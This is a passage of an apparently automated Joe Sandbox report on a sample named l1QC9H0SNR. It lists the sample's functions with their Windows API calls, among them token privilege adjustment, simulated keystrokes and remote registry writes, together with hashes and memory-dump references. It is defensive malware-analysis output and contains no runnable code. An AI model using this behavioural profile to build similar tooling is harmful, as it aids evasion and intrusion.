                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              • Opcode ID: 3b133604e3c35b8b6c7507b89bef6b0e4b915d07d35fc4973e0e4ebff91d79e7
                                              • Instruction ID: ff2afaa97fceddfaf176cd2d2c7d83306ca91fb99c7e287733f5976e3de96f1c
                                              • Opcode Fuzzy Hash: 3b133604e3c35b8b6c7507b89bef6b0e4b915d07d35fc4973e0e4ebff91d79e7
                                              • Instruction Fuzzy Hash: 9C718F702047428FC714EF68C491AAAB7E0EF89355F0449EDF8969B3A1DB74ED09CB52
                                              Function 01009950 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 01009961
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction ID: a5ad71b3c69aa147feeb2c73f4610c21f3117544286a7e26f7a21db9a2cf9c13
                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction Fuzzy Hash: 3FE0E67494410EDFDB00EFF8D5496DE7FB4EF04301F100161FD05D2281DA309D508A62

                                              Non-executed Functions

                                              Function 00BDCABC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 632windowkeyboardnativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00BDCB37
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BDCB95
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BDCBD6
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BDCC00
                                              • SendMessageW.USER32 ref: 00BDCC29
                                              • _wcsncpy.LIBCMT ref: 00BDCC95
                                              • GetKeyState.USER32(00000011), ref: 00BDCCB6
                                              • GetKeyState.USER32(00000009), ref: 00BDCCC3
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BDCCD9
                                              • GetKeyState.USER32(00000010), ref: 00BDCCE3
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BDCD0C
                                              • SendMessageW.USER32 ref: 00BDCD33
                                              • SendMessageW.USER32(?,00001030,?,00BDB348), ref: 00BDCE37
                                              • SetCapture.USER32(?), ref: 00BDCE69
                                              • ClientToScreen.USER32(?,?), ref: 00BDCECE
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BDCEF5
                                              • ReleaseCapture.USER32 ref: 00BDCF00
                                              • GetCursorPos.USER32(?), ref: 00BDCF3A
                                              • ScreenToClient.USER32(?,?), ref: 00BDCF47
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BDCFA3
                                              • SendMessageW.USER32 ref: 00BDCFD1
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BDD00E
                                              • SendMessageW.USER32 ref: 00BDD03D
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BDD05E
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BDD06D
                                              • GetCursorPos.USER32(?), ref: 00BDD08D
                                              • ScreenToClient.USER32(?,?), ref: 00BDD09A
                                              • GetParent.USER32(?), ref: 00BDD0BA
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BDD123
                                              • SendMessageW.USER32 ref: 00BDD154
                                              • ClientToScreen.USER32(?,?), ref: 00BDD1B2
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BDD1E2
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BDD20C
                                              • SendMessageW.USER32 ref: 00BDD22F
                                              • ClientToScreen.USER32(?,?), ref: 00BDD281
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BDD2B5
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BDD351
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                              • String ID: @GUI_DRAGID$F
                                              • API String ID: 302779176-4164748364
                                              • Opcode ID: 6f1ed162aec4cf2a3655625d9093067b0dbc20986c11b6d92f324096891e48e5
                                              • Instruction ID: d06289ca1c0c7b3196f5f841f48bff2ef0cc24384dc1da856810b8d2fcf3e622
                                              • Opcode Fuzzy Hash: 6f1ed162aec4cf2a3655625d9093067b0dbc20986c11b6d92f324096891e48e5
                                              • Instruction Fuzzy Hash: 0742BC74209246AFDB24CF28C884BAAFFE5FF49310F14459AF696873A0E731D845DB91
                                              Function 00B66F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove$_memset
                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                              • API String ID: 1357608183-1798697756
                                              • Opcode ID: 091e7272ccc4847613a37599495c399c74234575d1d82e7fc23590a78471346f
                                              • Instruction ID: beb77bf9a6d616040578a70228f72fec8323b96cdef5f26b7808fd36ee06772a
                                              • Opcode Fuzzy Hash: 091e7272ccc4847613a37599495c399c74234575d1d82e7fc23590a78471346f
                                              • Instruction Fuzzy Hash: 2593A171A48215DFDB24CF98C881BADB7F1FF49714F2485AAE945AB380E7749E81CB40
                                              Function 00B548D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32(00000000,?), ref: 00B548DF
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B8D665
                                              • IsIconic.USER32(?), ref: 00B8D66E
                                              • ShowWindow.USER32(?,00000009), ref: 00B8D67B
                                              • SetForegroundWindow.USER32(?), ref: 00B8D685
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B8D69B
                                              • GetCurrentThreadId.KERNEL32 ref: 00B8D6A2
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8D6AE
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B8D6BF
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B8D6C7
                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B8D6CF
                                              • SetForegroundWindow.USER32(?), ref: 00B8D6D2
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D6E7
                                              • keybd_event.USER32(00000012,00000000), ref: 00B8D6F2
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D6FC
                                              • keybd_event.USER32(00000012,00000000), ref: 00B8D701
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D70A
                                              • keybd_event.USER32(00000012,00000000), ref: 00B8D70F
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D719
                                              • keybd_event.USER32(00000012,00000000), ref: 00B8D71E
                                              • SetForegroundWindow.USER32(?), ref: 00B8D721
                                              • AttachThreadInput.USER32(?,?,00000000), ref: 00B8D748
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 4125248594-2988720461
                                              • Opcode ID: bf17b60b67f9c9877f051994ace877b1b1f22c8c168d5e511de9a4d55a2a35d2
                                              • Instruction ID: ce7157f824bea81dc180b1668a9aa3e8450b7f98420302dd107e3e643f4f4b30
                                              • Opcode Fuzzy Hash: bf17b60b67f9c9877f051994ace877b1b1f22c8c168d5e511de9a4d55a2a35d2
                                              • Instruction Fuzzy Hash: 59317771A453187AEB206F619C89F7F7F6CEB44B50F104066FA05EB1E1DA705D00EBA0
                                              Function 00BA8310 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 224COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BA87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
                                                • Part of subcall function 00BA87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
                                                • Part of subcall function 00BA87E1: GetLastError.KERNEL32 ref: 00BA8865
                                              • _memset.LIBCMT ref: 00BA8353
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00BA83A5
                                              • CloseHandle.KERNEL32(?), ref: 00BA83B6
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00BA83CD
                                              • GetProcessWindowStation.USER32 ref: 00BA83E6
                                              • SetProcessWindowStation.USER32(00000000), ref: 00BA83F0
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00BA840A
                                                • Part of subcall function 00BA81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA8309), ref: 00BA81E0
                                                • Part of subcall function 00BA81CB: CloseHandle.KERNEL32(?,?,00BA8309), ref: 00BA81F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                              • String ID: $default$winsta0
                                              • API String ID: 2063423040-1027155976
                                              • Opcode ID: e8a5800ba4b2c2148123d61f7bfa549c7e68b65abf8c015c768b14853b3e0838
                                              • Instruction ID: e2e797c9590b33d9d85ce170dbedc62a5606bd4c5885aac5af0b669dfb8f1c12
                                              • Opcode Fuzzy Hash: e8a5800ba4b2c2148123d61f7bfa549c7e68b65abf8c015c768b14853b3e0838
                                              • Instruction Fuzzy Hash: 9B814B71D09209AFDF119FA4CC45AEEBBF9EF05304F1481AAFD15A6661EB318E14DB20
                                              Function 00BBC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00BBC78D
                                              • FindClose.KERNEL32(00000000), ref: 00BBC7E1
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BBC806
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BBC81D
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BBC844
                                              • __swprintf.LIBCMT ref: 00BBC890
                                              • __swprintf.LIBCMT ref: 00BBC8D3
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • __swprintf.LIBCMT ref: 00BBC927
                                                • Part of subcall function 00B73698: __woutput_l.LIBCMT ref: 00B736F1
                                              • __swprintf.LIBCMT ref: 00BBC975
                                                • Part of subcall function 00B73698: __flsbuf.LIBCMT ref: 00B73713
                                                • Part of subcall function 00B73698: __flsbuf.LIBCMT ref: 00B7372B
                                              • __swprintf.LIBCMT ref: 00BBC9C4
                                              • __swprintf.LIBCMT ref: 00BBCA13
                                              • __swprintf.LIBCMT ref: 00BBCA62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                              • API String ID: 3953360268-2428617273
                                              • Opcode ID: 59f98f273bdf7acc2e7eaa23f519b74e24d8984ad04622f7aa4d41d5a6bee064
                                              • Instruction ID: 176cd7363fccc651d794aeca97498ee8b67e3c9d0d8229cb1da0fb610288eb05
                                              • Opcode Fuzzy Hash: 59f98f273bdf7acc2e7eaa23f519b74e24d8984ad04622f7aa4d41d5a6bee064
                                              • Instruction Fuzzy Hash: F1A11FB1508305ABC710EF94CC95EBFB7ECEF98701F4049A9F99586191EB35DA08CB62
                                              Function 00BBEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00BBEFB6
                                              • _wcscmp.LIBCMT ref: 00BBEFCB
                                              • _wcscmp.LIBCMT ref: 00BBEFE2
                                              • GetFileAttributesW.KERNEL32(?), ref: 00BBEFF4
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00BBF00E
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00BBF026
                                              • FindClose.KERNEL32(00000000), ref: 00BBF031
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00BBF04D
                                              • _wcscmp.LIBCMT ref: 00BBF074
                                              • _wcscmp.LIBCMT ref: 00BBF08B
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBF09D
                                              • SetCurrentDirectoryW.KERNEL32(00C08920), ref: 00BBF0BB
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBF0C5
                                              • FindClose.KERNEL32(00000000), ref: 00BBF0D2
                                              • FindClose.KERNEL32(00000000), ref: 00BBF0E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1803514871-438819550
                                              • Opcode ID: 783977bdc71e10a349c8d7063d800573dc1ccf3cf6bfad31819151ed77331f7e
                                              • Instruction ID: e59da4f38bbdfa7f468280c9c39da89e82ab13376215a8fa98f9fdc17788d1cb
                                              • Opcode Fuzzy Hash: 783977bdc71e10a349c8d7063d800573dc1ccf3cf6bfad31819151ed77331f7e
                                              • Instruction Fuzzy Hash: 9631F03250520A6BDB14AFA4DC59AFEB7ECDF48360F0441B2F845E30A1EFB0DA44CA64
                                              Function 00BD0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD0953
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BDF910,00000000,?,00000000,?,?), ref: 00BD09C1
                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BD0A09
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BD0A92
                                              • RegCloseKey.ADVAPI32(?), ref: 00BD0DB2
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BD0DBF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Close$ConnectCreateRegistryValue
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 536824911-966354055
                                              • Opcode ID: 66ec5299bade343ad993e1ad1be2ed6989493bef3820871e5530437cd32a64f5
                                              • Instruction ID: f07defda9d4ccd3e9f470572bb884fbde672b96a571506c22aa275710b47653d
                                              • Opcode Fuzzy Hash: 66ec5299bade343ad993e1ad1be2ed6989493bef3820871e5530437cd32a64f5
                                              • Instruction Fuzzy Hash: 500238756146019FCB14EF24C891E2AB7E5FF89314F0485ADF89A9B3A2DB30ED45CB81
                                              Function 00BDC5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • DragQueryPoint.SHELL32(?,?), ref: 00BDC627
                                                • Part of subcall function 00BDAB37: ClientToScreen.USER32(?,?), ref: 00BDAB60
                                                • Part of subcall function 00BDAB37: GetWindowRect.USER32(?,?), ref: 00BDABD6
                                                • Part of subcall function 00BDAB37: PtInRect.USER32(?,?,00BDC014), ref: 00BDABE6
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00BDC690
                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BDC69B
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BDC6BE
                                              • _wcscat.LIBCMT ref: 00BDC6EE
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BDC705
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00BDC71E
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00BDC735
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00BDC757
                                              • DragFinish.SHELL32(?), ref: 00BDC75E
                                              • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00BDC851
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                              • API String ID: 2166380349-3440237614
                                              • Opcode ID: 89b7dbe5146dd2bb2301adc2d838f344b30f99535ccf8b03671099a9d23afafb
                                              • Instruction ID: 968dd062ef46fc255852b41928ddc9391b34680786a4e587bffaa44d6794cb34
                                              • Opcode Fuzzy Hash: 89b7dbe5146dd2bb2301adc2d838f344b30f99535ccf8b03671099a9d23afafb
                                              • Instruction Fuzzy Hash: 1D617D71508301AFC701DF64DC95EAFBBE8EF89310F00496EF595972A1EB309A49CB52
                                              Function 00BBF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00BBF113
                                              • _wcscmp.LIBCMT ref: 00BBF128
                                              • _wcscmp.LIBCMT ref: 00BBF13F
                                                • Part of subcall function 00BB4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BB43A0
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00BBF16E
                                              • FindClose.KERNEL32(00000000), ref: 00BBF179
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00BBF195
                                              • _wcscmp.LIBCMT ref: 00BBF1BC
                                              • _wcscmp.LIBCMT ref: 00BBF1D3
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBF1E5
                                              • SetCurrentDirectoryW.KERNEL32(00C08920), ref: 00BBF203
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBF20D
                                              • FindClose.KERNEL32(00000000), ref: 00BBF21A
                                              • FindClose.KERNEL32(00000000), ref: 00BBF22C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
